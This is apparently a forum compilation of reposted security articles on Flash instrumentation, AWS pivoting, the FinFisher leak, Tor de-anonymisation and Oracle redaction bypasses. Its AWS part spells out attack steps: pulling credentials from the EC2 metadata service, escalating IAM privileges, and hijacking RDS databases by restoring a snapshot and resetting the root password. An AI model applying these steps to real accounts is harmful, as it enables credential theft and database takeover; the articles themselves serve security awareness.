Nytro

Sulo Sulo is a dynamic instrumentation tool for Adobe Flash Player. It is built on Pin. Supported Flash versions The following Flash Player builds are supported: 10.3.181.23 standalone debug 10.3.181.23 standalone non-debug 10.3.181.23 ActiveX 11.1.102.62 standadlone non-debug 11.1.102.62 ActiveX You can add support for another Flash Player build by specifying some RVAs and offsets in FlashPlayerConfigBuilder.cpp. Limitations Sulo supports ActionScript3 method calls only - AVM1 is not (yet) supported. Building The easiest way to build Sulo is to use the sulo_vs2010.sln solution file with Visual Studio 2010. Download Intel Pin kit for Visual Studio 2010 Extract the ZIP Clone Sulo to pin-2.13-65163-msvc10-windows\source\tools\Sulo Open sulo_vs2010.sln and build the solution Plugins Sulo comes with three plugins: Call tracer - logs all ActionScript method calls, including arguments and return values Flash dumper - dumps Flash objects loaded with Loader.loadBytes() to disk SecureSWF - logs decrypted strings from secureSWF-protected files Creating your own plugin is easy: just inherit your class from ISuloPlugin, implement the virtual methods, and add the object to m_plugins in SuloPluginManager::init(). Sursa: https://github.com/F-Secure/Sulo

DeepSec 2013 Talk: Pivoting In Amazon Clouds The „cloud“ infrastructure is a crucial part of information technology. Many companies take advantage of outsourced computing and storage resources. Due to many vendors offering a multitude of services, the term „cloud“ is often ill-defined and misunderstood. This is a problem if your IT security staff needs to inspect and configure your „cloud“ deployment with regards to security. Of course, virtualisation technology can be hardened, too. However the „cloud“ infrastructure brings its own features into the game. This is where things get interesting and where you have to broaden your horizon. Andres Riancho will show you in his talk Pivoting In Amazon Clouds what pitfalls you can expect when deploying code and data in the Amazon Cloud. Classical security tests won’t be enough. The Amazon Elastic Compute Cloud (EC2) is more than just virtual iron. You also get to think about instance life cycles (remember that virtual systems are very volatile), (user) data, AWS Identity and Access management (IAM) roles, and more “meta stuff” attached to your AWS infrastructure. What else is there? Let’s give you some in-depth information from Andres’ talk. EC2 Instance Meta*-Data All EC2 instances have meta-*data, such as the used Amazon Machine Images (AMI), kernel and region. This meta*-data is made available to the instance through a web server (only accessible to that particular instance) which lives at http://169.254.169.254/. Amazon’s meta*-data documentation better explains all the details about the instance meta*-data and how to access it. From the information security perspective the important information available in the meta-*data is: local IP address user data instance profile (AWS API credentials as explained later) Amazon Machine Image (AMI) When creating a new EC2 instance, or defining a launch configuration which will be used together with auto scaling groups, the AWS administrator can provide a script which will be run by the EC2 instance operating system as one of the last boot steps. This script, also called user data, is stored by AWS in the instance meta data and retrieved by the OS during boot. In Ubuntu the cloud*init daemon is responsible from retrieving and running this script. User data scripts are a common way to configure EC2 instances. They install base packages, git client, define variables (for source repositories, etc.), download application source code, compile code, or start required daemon processes. Since in most cases the repository where the instance’s application source code is private, SSH keys are used to access it. GitHub, BitBucket and other widely used source repositories call these “Deploy SSH Keys”. The SSH keys used to access the repository are usually hard-*coded into the user data script, or stored in an alternate location where the script can download them. This represents a risk when, because of a vulnerability, an attacker is able to proxy HTTP GET requests through the EC2 instance which allows him to retrieve the user data script from the meta data. In other words, if there is a way for the attacker to ask any of the services running on the instance to perform an HTTP GET request to arbitrary URLs and then return the HTTP response body to the attacker, then he would get access to the repository URL, branch and SSH keys allowing him to access the application source. The most common vulnerability that allows this type of access is a PHP Remote File Include but any other vulnerable software which allows HTTP proxying could be used to retrieve the meta-*data too. Instance Profiles It is common practice for applications running on EC2 instances to access AWS services like SQS or S3. In order for this to work the application needs to have access to AWS credentials, there are various ways to achieve this, but Amazon AWS recommends using instance profiles. Instance profiles are defined by the AWS architect, who defines which permissions will be available to the EC2 instances using the profile. For example, it is possible to create an instance profile with “SQS:*” permissions which would allow access to all API calls in the SQS service. Once created, the instance profile is associated with an EC2 instance or a launch configuration. When the instances are started AWS creates a unique set of access key, a secret key, and security token and makes them available to the instance through its meta data. Most libraries which consume AWS services, such as boto, know how to retrieve the meta data credentials and use them to access the AWS services. Since the instance profile credentials are stored in the meta*-data, it suffers from the same risks as any other information stored there. Once those credentials are retrieved from the instance, it is possible to use them in any other system with Internet access. The permissions available to the attacker using the stolen credentials will be the same as the AWS EC2 instance, making it very important for the AWS administrator to use the least privilege principle for all AWS permissions. It is also possible to enumerate permissions by use of the nimbostratus tool introduced by Andres. IAM:* Privilege Escalation Amazon’s IAM service is used to manage users, groups, roles and permissions. The permissions assigned to a group or user are fine grained and are usually created using Amazon’s IAM policy generator and then set using Amazon’s IAM service. An Amazon architect can create a custom permission set which would allow access to the different AWS services such as SQS, RDS, EC2 and IAM itself. If special care is not taken by the AWS architect when assigning IAM permissions to a user, he could use IAM API calls to elevate his privileges. Take a look at this example. AWS user Alice only has privileges to access IAM API calls, IAM:* for short Alice uses those privileges to create a new user: Bob Alice creates a new role with permissions to access all AWS services Alice assigns the newly created role to Bob Alice creates access keys for the user Bob Alice accesses any AWS service using Bob’s user To run this attack Alice requires at least these IAM permissions: CreateUser CreateAccessKey PutUserPolicy It is important to notice that it would be also possible to achieve the same goal using other calls to the IAM service, for example it is possible to create a group, assign the policy to that group and then make the newly created user part of the group; or even make Alice part of the new group with high privileges. Using AWS to access Virtualized Database Information One of the most popular services provided by Amazon is RDS, which provides managed SQL databases. RDS reduces the management required by database servers and makes scaling and high availability easy to achieve. SQL databases started from RDS can be managed using two very distinct methods: SQL database root user, connecting to the SQL server port (ie. 3306 in MySQL) Amazon’s RDS API, sending HTTPS requests to the RDS API endpoint Each method allows the user to perform different actions on the database, information and users. Now imagine the following situation: An intruder got access to a set of AWS credentials. The credentials have permissions to access RDS:*. The intruder has no other knowledge nor access to the SQL DB running on RDS. Any knowledgeable intruder will identify three API calls which could be used to access the information stored in SQL databases managed by RDS: CreateDBSnapshot, RestoreDBInstanceFromDBSnapshot and ModifyDBInstance. The steps are trivial: Use CreateDBSnapshot to create a backup of the RDS instance we want to get access to. Use RestoreDBInstanceFromDBSnapshot to create a new RDS instance with all the information from the original one. When the instance is running we’ll still won’t be able to access it using the SQL server port, since we don’t have valid credentials for that. To solve that we call ModifyDBInstance, which will change the “root” user’s password. Using a SQL client (ie. mysql*client in Ubuntu) the intruder can connect to the DB using the “root” user and the credentials set in ModifyDBInstance. Please note that an intruder could also have called ModifyDBInstance on an existing RDS instance and change the “root” password, which could be highly destructive and create a denial of service if the root user is used to access the SQL database from within the application, but also will grant him “root” account access to the SQL server. Tools Andres Riancho will present tools created during his research. These tools allow you to help with the enumeration and exploitation of AWS misconfigurations (which is just another way of saying audit). Who should attend? Anyone seriously working with or considering Amazon Web Services (or any other kind of „Cloud“ infrastructure) has to attend this talk! The „Cloud“ is more than just virtualisation. You have to deal with the additional APIs and details it brings with it. The concepts discussed in this configuration are especially important for penetration testers and auditors who attackinvestigate „Cloud“ infrastructure. Sursa: http://blog.deepsec.net/?p=1548

Documents on Legal Spyware “FinFisher” Leaked August 6th, 2014, 16:58 GMT · By Ionut Ilascu A set of files have been posted online, detailing the capabilities and features of the “FinFisher” spyware suite (also known as FinSpy), a package sold by a German company called Gamma Group, to governments and law enforcement agencies. The documentation was published through a Twitter account that purports to be from the company’s PR department; however, the account, operated by someone with the handle Phineas Fisher, is not affiliated with Gamma Group. The information contained by the files is quite recent, the newest of them are dated April 14, 2014. These are release notes for FinSpyPC and FinSpyMobile 4.51. For the mobile version of the spyware, various communication channels can be monitored (calls, short text messages, multimedia messages) and it allows access to stored data (address book). Moreover, it allows making silent calls in order to listen to the microphone remotely. In another document, it is stated that FinFisher for PC bypasses the detection of almost 40 regularly tested antivirus systems. It is unclear which antivirus solutions the spyware was tested against, but a tweet from Phineas Fisher (@GammaGroupPR) on August 3, showed that Avast’s product could detect its presence on an infected system. An update to the desktop version released in April included modifications that allowed the rootkit component to evade security solutions such as the one from Avast and Microsoft Security Essentials. Another change referred to the Skype module of the malware, “make the appropriate modifications to avoid the popup Skype brings when the Trojan Skype module injects code into Skype.” A list of limitations is also available, and it appears that the modern version (Metro) of Skype is not supported on Windows 8. However, the date of the document is April 14, 2014, and there is a high chance that Gamma Group managed to develop an updated version that eliminates this restriction. The tongue in cheek Twitter account offers links to a list of prices for the legal malware developed for governments. It seems that customers paid almost €1.5 / $2 million for the software package, while practical penetration testing costs reached €27,000 / $36,000. Multiple services and packages are offered, and purchasing all of them could cost a customer close to €3 / $4 million. The mock reason for creating the Twitter account and leaking the documents is that Gamma International ran out of governments to sell their spyware and opened the sales to the public in order to continue their business. Here at Gamma International, we've run out of governments to sell to, so we're opening up sales to the general public! — Phineas Fisher (@GammaGroupPR) August 3, 2014 Sursa: Documents on Legal Spyware “FinFisher” Leaked

Hacking Tor and Online Anonymity Introduction Tor is the acronym of “The onion router”, a system implemented to preserve online anonymity. Tor client software routes Internet traffic through a worldwide volunteer network of servers that hide user information, eluding surveillance of government and other bad actors. The Tor project was born in the military sector, sponsored the US Naval Research Laboratory, and from 2004 to 2005 it was supported by the Electronic Frontier Foundation. Today the software is under development and maintenance of the Tor Project Team. The encryption processes implemented in the Tor Network allow it to protect users’ privacy. Tor traffic is encrypted multiple times passing through different nodes of the network, also known as Tor relays. Law enforcement and Intelligence agencies all over the world are spending a considerable effort to try to break the encryption used with Tor. Practically every government is trying to infiltrate the network to de-anonymize its users. The Tor network is widely used by digital activists and individuals in many critical regions to avoid the Internet censorship operated by governments in China, Syria, Bahrain and Iran. According to Tor Metrics, the number of people worldwide who directly access the anonymizing network is 2.5 million. Figure – Users directly connected to Tor network In this post is an overview of the recent events regarding Tor and the attacks on its infrastructures, with explicit reference to principal initiatives conducted by governments to de-anonymize Tor users. Governments vs Tor Governments are spending great effort to improve monitoring capabilities. Tor networks and other anonymizing networks represent an obstacle to Internet monitoring. Governments sustain that technologies like Tor are abused by cybercrime and terrorists and are a potential source of threats, but organizations for the defense of online privacy and freedom of expression sustain that intelligence agencies are trying to extend their monitoring capabilities over anonymizing networks. Russian Government wants to crack Tor Intelligence agencies declared war on the anonymizing network. Edward Snowden revealed months ago that the US intelligence is worried by possible misuses of the Tor network and was investing to compromise it. Also the Russian government is actively working to try to crack Tor encryption to de-anonymize its users. The Ministry of the Interior of the Russian Federation (MVD) has recently started an initiative to “study the possibility of obtaining technical information about users (user equipment) of Tor anonymous network”. The Russian government has issued a tender to recruit companies and organizations which are interested in developing the technology to track users and their activities within the Tor network. The authorities are offering nearly 4 million rubles, approximately $111,000, for the development of technology to decrypt data sent over Tor and identify Tor users. The tender, titled “Perform research, code ‘TOR’ (Navy),” was posted on July 11th on the official procurement website. Figure – Competition promoted by the Ministry of the Interior of the Russian Federation (MVD) Officially the Kremlin is sustaining similar projects “in order to ensure the country’s defense and security”. Russian intelligence fears that the anonymizing networks could be used by terrorists and foreign intelligence to conspire against the government of Moscow. A few days ago I asked a colleague to help me to translate the original tender, the spelling of “TOP” comes from that original document (all-caps, Russian transliteration). The tender is about Tor indeed and the term “Scientific Production Association” (?????? -???????????????? ???????????) is a Soviet/Russian cover word for a military or a KGB/FSB R&D outlet. The one in question belongs to the Interior Ministry, which is in charge of police and penitentiary. The tender requires active security clearance specifically in the LI (though I wonder if “legal” is applicable to Russia at all) and a general high level security clearance. Every company that desires to participate in the initiative has to pay a 195,000 ruble (about $5,555) application fee. Who is spying on Tor network exit nodes from Russia? The researchers Philipp Winter and Stefan Lindskog of Karlstad University in Sweden presented the results of a four-month study conducted to test Tor network exit nodes for sneaky behavior. The expert noticed that a not-specified Russian entity is eavesdropping on nodes at the edge of the Tor network. The principle on which their investigation is based is the possibility to monitor for exit relays to snoop and tamper with anonymized network traf?c. The researchers have worked to define a methodology to expose malicious exit relays and document their actions. The researchers used a custom tool, a “fast and modular exit relay scanner”, for their analysis, and they discovered that the entity appeared to be particularly interested in users’ Facebook traffic. They designed several scanning modules for detecting common attacks and used them to probe all exit relays. “We are able to detect and thwart many man-in-the-middle attacks which makes the network safer for its users,” they reported in the paper published in their research. Winter and Lindskog identified 25 nodes that tampered with web traffic, decrypted the traffic, or censored websites. On the overall nodes compromised, 19 were tampered with using a man-in-the-middle attacks on users, decrypting and re-encrypting traffic on the fly. Figure – Tor network infiltrated by malicious nodes Tor network anonymizes users’ web experience, under specific conditions, bouncing encrypted traffic through a series of nodes before accessing the web site through any of over 1,000 “exit nodes.” The study proposed is based on two fundamental considerations: User’s traffic is vulnerable at the exit nodes. For bad actors, the transit through an exit node of the traffic exposes it to eavesdropping. The case of WikiLeaks was very popular, which was initially launched with documents intercepted from the Tor network eavesdropping on Chinese hackers through a bugged exit node. Tor nodes are run by volunteers that can easily set up and take down their servers every time they need and want. The attackers in these cases adopted a bogus digital certificate to access the traffic content. For the remaining six cases, it has been observed that impairment resulted from configuration mistakes or ISP issues. The study revealed that the nodes used to tamper the traffic were configured to intercept only data streams for specific websites, including Facebook, probably to avoid detection of their activity. The researchers passive eavesdropped on unencrypted web traffic on the exit nodes. By checking the digital certificates used over Tor connections against the certificates used in direct “clear-web sessions”, they discovered numerous exit nodes located in Russia that were used to perform man-in-the-middle attacks. The attackers control the Russian node access to the traffic and re-encrypt it with their own self-signed digital certificate issued to the made-up entity “Main Authority.” It is difficult to attribute the responsibility for these attacks. Researchers speculated the attacks are part of a sophisticated operation conducted to de-anonymize the Tor network. The experts also noticed that when blacklisting the “Main Authority” Tor nodes, new ones using the same certificate would be setup by the same entity. The experts exclude that any government agency was conducting the attack because the technique adopted is too noisy. They suspect that a group of isolating individuals is responsible for the anomalous activity. One of the most noisy choices of the attackers is the use of self-signed certificates that cause a browser warning to Tor users when they visit the bogus website or were victims of MITM attacks. “It was actually done pretty stupidly,” says Winter. The National Security Agency wants to overwhelm Tor Anonymity American Whistleblower Edward Snowden released a collection of classified NSA documents titled ‘Tor Stinks‘, which explain how the NSA agency has developed the capability to de-anonymize a small fraction of Tor users manually. Tor Stinks isn’t an architecture for surveillance on a large-scale, but it allows US agents to track specific individuals during their navigation inside the Tor network. “We will never be able to de-anonymize all Tor users all the time, [but] with manual analysis we can de-anonymize a very small fraction of Tor users,” reports of the slides disclosed. In reality the intelligence agency is doing much more, trying to compromise the entire Tor network and degrading the user experience to dissuade people from using it. Figure – NSA Tor Stinks Project to overwhelm Tor Anonymity The NSA is operating in different ways to reach its goals. Its strategy relies on the following principles to unhinge Tor anonymity. It is running malicious Tor nodes to infiltrate the Tor networks, and at the same time, it is trying to exploit unknown flaws in every component of the anonymizing architecture, on both client and server sides. Slides leaked by Snowden on the Stinks project reveal that the NSA is conducting the following operations: Infiltrate Tor network running its Tor nodes. Both the NSA and GCHQ run Tor nodes to track traffic back to a specific user. The method is based on the circuit reconstruction from the knowledge of the ‘entry, relay and exit’ nodes between the user and the destination website. Exploiting zero-day vulnerability of the Firefox browser bundled with Tor. With this technique, the NSA was able to get the user’s IP address. In this way the FBI arrested the owner of the Freedom Hosting service provider accused of aiding and abetting child pornography. NSA also uses web cookies to track Tor users widely. The technique is effective also for the Tor Browser. The cookies are used to analyze the user’s experience on the Internet. The intelligence agency owned or controlled a series of websites that was able to read last stored cookies from the browser on the victim’s machine. With this technique, the agency collects the user’s data, including the IP address. Of course. expert users can avoid this type of control in numerous ways, for example, using a dedicated browser for exclusive Tor navigation, using only the official preconfigured Tor bundle or properly managing the cookies stored on their machine. Unfortunately, the surveillance methods appeared effective for a huge quantity of individuals. I always suggest to use a virtual machine with a live OS for protecting your Tor anonymity. This way, cache and cookies will be lost once the machine is shut down. Documents leaked by Snowden show that the NSA is using online advertisements i.e. Google Ads to make their tracking sites popular on the Internet. German public broadcaster ARD recently published a report on the use of the XKeyscore platform to compromise Tor anonymity. The media agency reported that two Germany-based Tor Directory Authority servers have been targeted by US intelligence. The broadcaster published for the first time the source code from Xkeyscore, even if ARD didn’t provide information on its origin and how they received it. XKeyscore gives the ‘widest-reaching’ collection of online data, analyzing the content of emails, social media and browsing history. In August 2014, The Guardian published an exclusive report on the NSA surveillance program, providing several NSA training slides from the secret program. Facebook chats and private messages become accessible to the intelligence agents simply providing the Facebook user name and a date range for the investigation. XKeyscore in fact provides instruments necessary for the analysis that are conducted also without any legal authorization or a warrant. “A top secret National Security Agency program allows analysts to search with no prior authorization through vast databases containing emails, online chats and the browsing histories of millions of individuals, according to documents provided by whistleblower Edward Snowden.” The NSA boasts in training materials that the program, called XKeyscore, is its “widest-reaching” system for developing intelligence from the Internet. The source code published by the ARD demonstrates that the NSA tracks people who are believed to live outside the US and who request Tor bridge information via e-mail or who search for or download Tor or the TAILS live operating system. The NSA was able to track their IP addresses. The XKeyScore analyzed by the experts includes IP addresses of the targeted Tor Directory Authority, part of the backbone of the Tor Network. These authorities are updated every hour with information related to new Tor relays. The post also explains that the authors, including the popular expert Jacob Appelbaum, were targeted by the XKeyscore. “Their research in this story is wholly independent from the Tor Project and does not reflect the views of the Tor Project in any way … During the course of the investigation, it was further discovered that an additional computer system run by Jacob Appelbaum for his volunteer work with helping to run part of the Tor network was targeted by the NSA. Moreover, all members of this team are Tor users and appear to be have been targets of the mass surveillance described in the investigation,” ARD stated. Going deep in the source code, it is possible to verify that the NSA is also targeting users of anonymous remailer MixMinion. [TABLE] [TR] [TD=class: gutter]1 2 3 4 5 6 7 8 9 10 11 12[/TD] [TD=class: code]/** * Placeholder fingerprint for Tor hidden service addresses. * Real fingerpritns will be fired by the plugins * 'anonymizer/tor/plugin/onion/*' */ fingerprint('anonymizer/tor/hiddenservice/address') = nil; // END_DEFINITION // START_DEFINITION appid('anonymizer/mailer/mixminion', 3.0, viewer=$ascii_viewer) = http_host('mixminion') or ip('128.31.0.34'); // END_DEFINITION [/TD] [/TR] [/TABLE] Law enforcement agencies, Tor Network and cybercrime De-Anonymization of the Tor Network users is also a goal for law enforcement agencies that need to track users in order to identify and prevent illicit activities. The FBI last year revealed that experts at the Bureau had compromised the Freedom Hosting company during an investigation of child pornography. Freedom Hosting was probably the most popular Tor hidden service operator company. The FBI exploited a malicious script that takes advantage of a Firefox Zero-day to identify some users of the Tor anonymity network. In an Irish court, the FBI Supervisory Special Agent Brooke Donahue revealed that the FBI had control of the Freedom Hosting company to investigate on child pornography activities. Freedom Hosting was considered by US law enforcement to be the largest child porn facilitator on the planet. For its analysis, the FBI exploited a Firefox Zero-day (MFSA 2013-53) for Firefox 17, also confirmed by Mozilla, that allowed it to track Tor users. It exploited a flaw in the Tor browser to implant a tracking cookie which fingerprinted suspects through a specific external server. “Security researcher Nils reported that specially crafted web content using the onreadystatechange event and reloading of pages could sometimes cause a crash when unmapped memory is executed. This crash is potentially exploitable.” The exploit is based on a JavaScript that is a tiny Windows executable hidden in a variable dubbed “Magneto”. Magneto code looks up the victim’s Windows hostname and MAC address and sends the information back to the FBI Virginia server, exposing the victim’s real IP address. The script sends back the data with a standard HTTP web request outside the Tor Network. Figure – Magneto script used by FBI The investigation caused the identification and the arrest of Eric Eoin Marques, the 28-year-old Irishman owner and operator of Freedom Hosting. Freedom Hosting hosted hundreds of websites, many of them used to conduct illegal activities taking advantage of the anonymity provided by the Tor network. Tor is ordinarily used by cybercriminals to conduct illicit activities like money laundering, exchanging of child porn material, renting for hacking services, and sale of drugs and weapons. Freedom Hosting was offering hosting services to criminal gangs which were moving their business in the Deep Web. Consider that hundreds of hacking sites such as HackBB were hosted by the company. Donahue revealed that the Freedom Hosting service hosted at least 100 child porn sites, providing illegal content to thousands of users, and claimed Marques had visited some of the sites himself. Eric Eoin Marques knew he was being hunted, apparently he sent the earnings to his girlfriend over in Romania. The FBI, analyzing the Marques’s seized computer, discovered that he had made inquiries about how to get a visa and entry into Russia, and residency and citizenship in the country. Marques also made searches for a US passport template and a US passport hologram star. He probably was planning an escape. Court documents and FBI files released under the FOIA have described the CIPAV (Computer and Internet Protocol Address Verifier) as software the FBI can deliver through a browser exploit to gather information from the suspect’s machine and send it to on the server of the Bureau in Virginia. The event is confirmation that the Tor network provides an extra layer of obfuscation, but it must be clear it does not provide bulletproof online anonymity. Many researchers demonstrated that it is possible to de-anonymize users by exploiting a flaw in the protocol itself, or in some of the numerous applications used, like web browser and live distro. Break Tor network anonymity with just $3000 It is a common belief that to de-anonymize the Tor network, it is necessary to make a great effort in term of resources and computational capabilities. Many security experts have started to investigate the possibility that US intelligence and others have found a way to compromise the Tor network. A few weeks ago, two hackers, Alexander Volynkin and Michael McCord, revealed to be able to de-anonymize Tor users easily. They also announced that they will present the results of their study at Black Hat 2014, despite that a few days ago they canceled their participation in the event. “Unfortunately, Mr Volynkin will not be able to speak at the conference since the materials that he would be speaking about have not yet [been] approved by Carnegie Mellon University/Software Engineering Institute for public release,” states the message posted on the official website of the event. Christopher Soghoian, principal technologist with the American Civil Liberties Union, has speculated that the researchers might have feared to be sued by criminal prosecution for illegal monitoring of Tor exit traffic. “Monitoring Tor exit traffic is potentially a violation of several federal criminal statutes,” he added. The expert was preparing a presentation, YOU DON’T HAVE TO BE THE NSA TO BREAK TOR: DEANONYMIZING USERS ON A BUDGET, to explain how to identify Tor users with a very small budget, just $3,000. “There is nothing that prevents you from using your resources to de-anonymize the network’s users instead by exploiting fundamental flaws in Tor design and implementation. And you don’t need the NSA budget to do so. Looking for the IP address of a Tor user? Not a problem. Trying to uncover the location of a Hidden Service? Done. We know because we tested it, in the wild … In this talk, we demonstrate how the distributed nature, combined with newly discovered shortcomings in design and implementation of the Tor network, can be abused to break Tor anonymity,” are the statements used by the two researchers to describe their work. According to the researchers, it is possible to de-anonymize users with a limited budget. The worrying news is that a persistent adversary like an intelligence agency “with a handful of powerful servers and a couple gigabit links can de-anonymize hundreds of thousands of Tor clients and thousands of hidden services within a couple of months.” The discovery made by the researchers, even if it was never publicly disclosed, seems to confirm the fact that the popular anonymizing network is affected by serious flaws that could be exploited by attackers to track users. One of the creators of the Tor project, Roger Dingledine, speaking of the discovery announced by the two researchers, admitted that the Tor Project had been “informally” shown some of the materials that would have been presented by the two researchers. “In response to our questions, we were informally shown some materials. We never received slides or any description of what would be presented in the talk itself beyond what was available on the BlackHat Webpage. “I think I have a handle on what they did, and how to fix it. We’ve been trying to find delicate ways to explain that we think we know what they did, but also it sure would have been smoother if they’d opted to tell us everything. The main reason for trying to be delicate is that I don’t want to discourage future researchers from telling us about neat things that they find. I’m currently waiting for them to answer their mail so I can proceed … Based on our current plans, we’ll be putting out a fix that relays can apply that should close the particular bug they found. The bug is a nice bug, but it isn’t the end of the world,” he added. The Dingledine’ words confirm that there is a flaw in the Tor architecture that the two scientists probably exploited. This means that the software may have been already compromised in the past by Intelligence agencies. Ongoing attacks As we discussed in the previous paragraph, law enforcement, intelligence agencies and individuals are interested in de-anonymizing Tor users for various purposes. Now it’s time to analyze a real ongoing attack, explaining the modus operandi of attackers. On July 30th, the members of the Tor project published on the official website a security advisory to reveal that earlier in the month, on July 4th, 2014, a group of relays was targeted by a cyber attack conducted with the goal to de-anonymize users. The experts on the Tor Project noticed that bad actors were targeting relays to track users accessing Tor networks or access Tor hidden services. “They appear to have been targeting people who operate or access Tor hidden services. The attack involved modifying Tor protocol headers to do traffic confirmation attacks. “The particular confirmation attack they used was an active attack where the relay on one end injects a signal into the Tor protocol headers, and then the relay on the other end reads the signal. These attacking relays were stable enough to get the HSDir (“suitable for hidden service directory”) and Guard (“suitable for being an entry guard”) consensus flags. Then they injected the signal whenever they were used as a hidden service directory, and looked for an injected signal whenever they were used as an entry guard. The technique is simple as efficient. The attack is possible when the attacker controls or observes the relays on both ends of a Tor circuit and then compares traffic timing, volume, or other characteristics to conclude that the two relays are part of the same circuit, which routes information from source to destination. In the case of the first relay in the circuit (“entry guard”), it knows the IP address of the user, and the last relay in the circuit (“exit nodes”) knows the resource or destination the user is accessing. Then the attacker is able to de-anonymize Tor users. Attackers were leveraging a critical flaw in Tor architecture to modify protocol headers in order to perform a traffic confirmation attack and inject a special code into the protocol header used by attackers to compare certain metrics from relays to de-anonymize users. 115 malicious fast non-exit relays (6.4% of the whole Tor network) were involved in the attack. The servers were actively monitoring the relays on both ends of a Tor circuit in an effort to de-anonymize users. The malicious relays were running Tor version 50.7.0.0/16 or 204.45.0.0/16 and bad actors were using them trying to de-anonymize Tor users who visit and run so-called hidden services. The malicious relays joined the Tor network on January 30th, 2014 and experts at Tor Project removed them from the network on July 4th, 2014. The members of the Tor project team also advised hidden service operators to change the location of their hidden service. “While we don’t know when they started doing the attack, users who operated or accessed hidden services from early February through July 4 should assume they were affected,” Tor said. When users access the Tor network with Tor software, their IP address is not visible and it appears to the Internet as the IP address of a Tor exit relay, which can be anywhere. Bad actors who were running the confirmation attack were looking for users who fetched hidden service descriptors. This means that attackers were not able to see pages loaded by users, nor whether users visited the hidden service they looked up. “The attack probably also tried to learn who published hidden service descriptors, which would allow the attackers to learn the location of that hidden service. In theory the attack could also be used to link users to their destinations on normal Tor circuits too, but we found no evidence that the attackers operated any exit relays, making this attack less likely. And finally, we don’t know how much data the attackers kept, and due to the way the attack was deployed (more details below), their protocol header modifications might have aided other attackers in de-anonymizing users too,” states the security advisory. In order to close the critical flaw, the Tor Project Team is suggesting Tor Relay Operators to upgrade Tor software to a recent release, either 0.2.4.23 or 0.2.5.6-alpha. Tor Project released a software update to prevent such attacks. Conclusions Law enforcement agencies and Intelligence are spending a great effort to de-anonymize the user experience on the Tor network, to discourage the use of anonymizing networks. Attackers can follow two directions: Try to break encryption used to anonymize the traffic. Try to exploit flaws in one of the numerous components present in the anonymizing architecture. As demonstrated by recent attacks on anonymizing software like Tails Live Distribution, probably the second choice is the most suitable. The presence of an unknown flaw in one of these components could allow a compromise of the entire architecture. Attackers know this, and they are concentrating all their effort to discover such flaws … but if you are a researcher, do not forget that every day anonymizing networks allow many individuals to avoid censorship and monitoring operated by authoritarian regimes. References http://securityaffairs.co/wordpress/26395/hacking/tor-network-broken.html http://securityaffairs.co/wordpress/26982/hacking/tor-working-fix-flaw.html http://securityaffairs.co/wordpress/27019/hacking/russian-government-crack-tor.html http://www.theregister.co.uk/2014/07/25/putin_crack_tor_for_me_and_ill_make_you_a_millionaire/ http://securityaffairs.co/wordpress/27193/hacking/attacks-against-tor-network.html http://securityaffairs.co/wordpress/5650/cyber-crime/what-is-the-deep-web-a-first-trip-into-the-abyss.html https://blog.torproject.org/blog/tor-security-advisory-relay-early-traffic-confirmation-attack http://www.cs.kau.se/philwint/spoiled_onions/techreport.pdf http://securityaffairs.co/wordpress/18397/hacking/tor-anonymity-tor-stinks.html http://www.bbc.com/news/technology-28573625 http://www.wired.com/2013/09/freedom-hosting-fbi/all/1 http://securityaffairs.co/wordpress/21535/cyber-crime/russia-spying-tor-network-exit-nodes.html http://securityaffairs.co/wordpress/26335/intelligence/xkeyscore-hit-tor-authority-server.html https://blog.torproject.org/blog/one-cell-enough By Pierluigi Paganini|August 6th, 2014 Sursa: Hacking Tor and Online Anonymity - InfoSec Institute

Oracle Database Redaction ‘Trivial to Bypass’ by Dennis Fisher LAS VEGAS–David Litchfield for many years was one of the top bug hunters in the game and specialized in causing large-scale headaches for Oracle. When he decided to retire and go scuba diving, there likely were few tears shed in Redwood City. Litchfield recently decided to resurface, which is good news for the security community and users but may not cause a celebration among Oracle engineers. There were few more proficient vulnerability finders during the 2000s than Litchfield, a self-taught researcher who found dozens and dozens of critical flaws in products up and down the Oracle catalog. While many of his peers focused on browsers and Web servers, Litchfield specialized in digging into the guts of Oracle’s database products and breaking them in new and creative ways. In the days when Oracle touted its security as Unbreakable, Litchfield made a habit of proving otherwise. Recently, he decided to take up the task again. After taking a long break from security research and spending a lot of time in close proximity to great white sharks, Litchfield began looking at Oracle’s security again, specifically a new data redaction service the company added in Oracle 12c. The service is designed to allow administrators to mask sensitive data, such as credit card numbers or health information, during certain operations. But when Litchfield took a close look he found a slew of trivially exploitable vulnerabilities “It’s a great idea. The problem is, of course, it’s trivial to bypass.” “It’s a great idea. The problem is, of course, it’s trivial to bypass,” he said during a talk at the Black Hat USA conference here Wednesday. “If Oracle had followed any sort of SDLC instead of just paying lip service to it, every one of these flaws would’ve been caught. It’s kindergarten stuff.” Litchfield found several methods for bypassing the data redaction service and tricking the system into returning data that should be masked. “The first method uses the RETURNING INTO clause with INSERT, UPDATE and DELETE operations. The RETURNING INTO clause allows data to be returned into a variable after a DML operation. This can be used to bypass Oracle data redaction,” he wrote in a paper outlining the flaws. A second method he found is essentially a brute force attack on the data in a redacted column in a database. “Another way to gain access to the data is with an iterative inference attack. It is possible to access data in a SELECT’s WHERE clause. This gives an attacker the opportunity to essentially guess or brute-force the data in a redacted column using a WHERE data LIKE predicate. Consider the following PL/SQL procedure. This simply tests the value of a given character at a given offset into the string. When it gets the first character correct it moves on to the next character and so on until all 16 characters of the credit card have been ascertained,” he said in the paper. Litchfield said that the methods he found were so simple he doesn’t even feel right calling them exploits. “There are issues that are trivial to find. They’re still not learning he lessons that people were leaning in 2003,” he said. “It’s 2014 and yet I’m still able to sit down and in the space of a few minutes find a bunch of things that I can send to Oracle as exploitable.” The data redaction bypasses that Litchfield found have bee patched, but he said he recently sent Oracle a critical flaw that enables a user gain control of the database. That flaw isn’t patched yet but is in the pipeline. Sursa: Oracle Database Redaction 'Trivial to Bypass' | Threatpost | The first stop for security news

CROSS SITE PRINTING Printer Spamming INTRODUCTION AND BACKGROUND Many network printers listen on port 9100 for a print job (RAW Printing or Direct IP printing). You can telnet directly to the printer port and enter text. Once you disconnect from the printer it will print out the text that you send it. Network printers also accept PostScript, and Printer Control language. The security around this is usually minimal – connect to the port, send the print job, disconnect and the printer prints the page. Within the last year there have been new discoveries on attacking the Intranet from the Internet1. This involves setting an image tag or script tag to an internally addressable IP address and then the browser will request the “image” resource. Several attacks can be accomplished; port scanning, fingerprinting devices, and changing internal router settings. Download: https://sites.google.com/site/aaronweaver2/CrossSitePrinting.pdf?attredirects=0

